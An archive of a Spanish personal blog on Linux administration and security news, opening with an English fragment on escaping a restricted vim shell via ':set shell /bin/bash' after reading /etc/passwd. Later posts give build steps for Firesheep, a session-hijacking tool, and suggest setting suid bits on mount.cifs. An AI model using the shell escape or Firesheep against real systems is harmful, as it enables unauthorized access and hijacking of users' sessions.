:q! => quit

:o => open a file

:!<command> => run command *in default shell*

We tried to list files with :!ls but it did not work. So we opened /etc/passwd with :o /etc/passwd and discovered that the default shell of sheep user was /usr/bin/vim. Simply change it with:
:set shell /bin/bash

Then we were able to list files (:!ls)
------------------------------------------------------------------------------

También es posible escribir (:sh) o (:shell) y obtener la shell

Anatomía de un ataque (RSA)

2011-04-04T21:20:00.000+02:00

Buenas,

Desde RSA, han comentado cómo fue el ataque que recibieron en sus sistemas.

Info: http://blogs.rsa.com/rivner/anatomy-of-an-attack/

TodoLinux Nº123

2011-02-12T11:30:00.000+01:00

Buenas,

Después de un tiempo sin publicar en TodoLinux, este mes aparezco por partida doble.

Los dos orientados a montar plataformas Web, por un lado cómo montar una Wiki y por otro lado cómo montar un CMS, en este caso Joomla!

David

Intypedia, seguridad de la informacion

2011-01-22T18:25:00.000+01:00

Buenas,

Este post es para publicitar Intypedia, un proyecto que pretende ser una enciclopedia de la seguridad de la información.

El contenido está creado por expertos en la materia, cada mes saldrá un vídeo explicando un nuevo tema. Hasta el momento están publicados los siguientes vídeos:

Intypedia es un proyecto de CRIPTORED.

David

Anonimato

2011-01-08T15:28:00.000+01:00

Últimamente he leído dos post sobre temas relacionados con el anonimato y la privacidad. Uno trata sobre como es posible realizar un posicionamiento de las personas y está escrito en el blog de securityartwork.

Se donde estas: tecnologías de posicionamiento en dispositivos de hoy en día

El segundo trata sobre cómo escribir en blogs de forma anónima por parte de segu-info.com.ar que se basan en un post de Electronic Frontier Foundation.

Blogueando anónimamente

La tercera recomendación viene de la historia "El arbol de la ciencia" de David Gutierrez Rubio que trata sobre la trazabilidad de nuestra vida privada mediante nuestros movimientos electrónicos.

David

Firesheep simplifica el robo de sesión

2010-12-05T18:42:00.001+01:00

Buenas,

Firesheep es una extensión de firefox de la que se ha hablado mucho últimamente, pues permite obtener las sesiones de usuario de páginas web como twitter, facebook, ... simplemente escuchando el tráfico.

Apareció en ToorCon 12 para ser usado en redes wireless, pero en hacktimes han demostrado que también se puede utilizar en redes cableadas haciendo un ataque de hombre en el medio.

Inicialmente, sólo está disponible para Windows y Mac pero es posible utilizarlo desde Linux realizando unos breves pasos que encontramos en http://www.tuxapuntes.com/drupal/node/1966:

$> git clone https://github.com/codebutler/firesheep.git

$> cd firesheep

$> git submodule update --init

$> apt-get install autoconf libtool libpcap-dev libboost-all-dev libhal-dev xulrunner-1.9.2-dev aircrack-ng

$> ./autogen.sh && make

Si da un error de ReferenceError:Cc is not defined es porque no identifica el vendedor de la tarjeta de red, para resolverlo hay que modificar la línea 48 (throw ex) por return string("ERROR"); en el fichero firesheep/backend/src/linux_plattform.cpp

Por último, se habrá creado un fichero en firesheep/build con extensión .xpi que podremos arrastrar a una ventana de Firefox para ser instalado

David

Análisis de tráfico

2010-11-04T21:01:00.001+01:00

En una nueva entrada de securitybydefault.com viene una Web donde recopilan trazas de tráfico de red para poder ser analizadas.

Por ejemplo, tienen trafico de Conflicker, Zeus, ...

Openpacket.org

pcapr.net

Dos webs interesantes!

Mula, el peor negocio de tu vida

2010-11-01T12:46:00.000+01:00

Parecía que las noticias sobre las 'mulas' no eran propias de España pero según leo en zonavirus.com la Comunidad Valenciana es tierra de mulas.

Kubuntu 10.4 knetworkmanager No gestiona

2010-08-02T20:18:00.001+02:00

Buenas,

después de un apagón del sistema por falta de batería, al siguiente reinicio network-manager "no gestiona" las redes del equipo.

Esto pasa porque se queda en un estado inconsistente el fichero de estado de knetworkmanager.

Solución en https://bugs.launchpad.net/ubuntu/+bug/555571

# service network-manager stop
# vim /var/lib/NetworkManager/NetworkManager.state

[main]
NetworkingEnabled=true
WirelessEnabled=true

# service network-manager start

¡Es bastante útil!

David

Como prepararse para una LAN Party

2010-07-07T14:56:00.000+02:00

Buenas,

antes de acudir a una LAN Party hay que revisar si nuestro equipo cumple con unos mínimos de seguridad para evitarnos sorpresas. Buscando información al respecto, me acordé de que en la mítica Chaos Communication Congress en su 26 edición tenían una página con recomendaciones.

How to survive (inglés)

Un resumen de estas recomendaciones es:

Pon una contraseña a la BIOS
Pon una contraseña en GRUB/LILO
¡Nunca dejes una rootshell abierta!
¡Haz una copia de seguridad de tus datos importantes!
Vigila tu hardware, o que alguien en quién confies lo haga
Piensa en el control de acceso
Pon extensiones de seguridad a tu disco duro
Considera la utilización de la criptografía y otras herramientas

Recomendaciones sobre navegar por Internet:

Utiliza un navegador seguro y desactiva el javascript o Flash
Fijate en las páginas que están cifradas

Navegación sin cifrar

No proporciones información privada durante la LAN Party
Considera borrar las cookies (puedes hacer una copia de seguridad para luego restaurarlas)
Usa la característica de SSH llamada "SOCKS port forwarding"(SSH -D) para hacer un tunel SSH hacia tu red de casa.

Navegación cifrada (HTTPS)

Ten cuidado de los ataques MITM, añade una entrada estática en la tabla ARP.
No te fíes de las páginas web con errores en certificados. Puede darse el caso que ciertas web no tengan un certificado firmado por una CA conocida, en estos casos, antes de acudir a la LAN Party añade el certificado a tu navegador.

Y esta la añado yo:

Piensa antes de darle al botón

David

smbmount sin necesidad de sudo

2010-07-07T12:30:00.000+02:00

Buenas,

Para montar un disco en red mediante samba se suele utilizar la herramienta smbmount. Las opciones que yo utilizo son:

$> smbmount '\\IP\carpeta' <<carpeta_local>> -o username=<<usuario>>

Esto nos dará un error de mount.cifs operación no permitida ( mount.cifs operation not permitted.

Lo que tenemos que hacer es poner el bit suid a mount.cifs que es el comando final que se ejecuta en el script smbmount. Por si no sabes que es el bit suid, no usarlo a la ligera!

#> chmod u+s /sbin/mount.cifs
#> chmod u+s /sbin/umount.cifs

David

Reducir tamaño imagen desde la consola en Linux

2010-07-06T11:58:00.000+02:00

Buenas,

En el mes de noviembre de 2009 escribí un post sobre reducir el tamaño de una imagen con Krita, este es un buen método si sólo tienes que reducir una imagen. Sin embargo, si tienes que reducir varias a la vez existe ImageMagick que permite retocar las imagenes desde la consola. Entre sus funciones está la reducir la resolución de una imagen, y por lo tanto, disminuirá su tamaño.

#> apt-get install imagemagick

Reducir tamaño imagen:

$> convert -resize <resolución> <imagen>
$> convert -resize 800x600 imagen1.jpg

¡Así de fácil!

David

VPN con ssh by systemadmin.es

2010-06-22T20:54:00.000+02:00

Buenas,

llevo un tiempo siguiendo el blog de systemadmin.es y os lo recomiendo a todos los que utilicéis algún tipo de sistema Unix. Tiene entradas muy potentes y sencillas.

VPN con ssh by sistemadmin.es

David

Review del reciente ataque masivo de SQLi

2010-06-16T19:08:00.000+02:00

Buenas,

en la web de Armonize han hecho un buen analisis del último ataque masivo de SQL Injection. No tiene desperdicio.

Saludos

David

Hotmail: Nuevas medidas de seguridad interesantes

2010-05-28T18:28:00.000+02:00

Buenas,

desde el INTECO envía una noticia sobre nuevas medidas de seguridad que se implantarán en el correo de hotmail y entre ellas destaca la posibilidad de adquirir una contraseña de uso único para el acceso a tu cuenta de correo. Muy útil si estamos en ordenadores públicos.

Noticia INTECO - Nuevas medidas de seguridad en el servicio de correo de Hotmail

David

Cortar un mp3 en Linux

2010-05-22T14:10:00.000+02:00

Buenas,

Una de las primeras entradas de este blog fue cómo cortar un mp3 en varios trozos en Ubutu, esa solución funciona pero si queremos dividir un mismo archivo mp3 en varias pistas de la misma duración tenemos la herramienta mp3splt.

Se puede descargar de los repositorios de ubuntu y es tan secilla de utilizar como

$> mp3splt -t 3.0 archivo.mp3

Con ese comando se dividirá el archivo en pistas de 3 minutos.

Saludos

Todo Linux Nº 113

2010-04-18T14:40:00.000+02:00

Buenas,

nuevo número de la revista TodoLinux, lo anuncio un poco tarde pero este mes está siendo muy ocupado.

En este número escribo un artículo sobre cómo montar un servidor FTP y asegurar las comunicaciones para que terceros no puedan coger nuestros documentos.

David

Ver fingerprint de servidor SSH

2010-03-12T17:05:00.000+01:00

Buenas

aquí queda un recordatorio para ver el fingerprint de un servidor SSH en linux, en concreto para OpenSSH:

$> ssh-keygen -lf /etc/ssh/ssh_host_rsa_key

David

Pd: como me gusta el pez!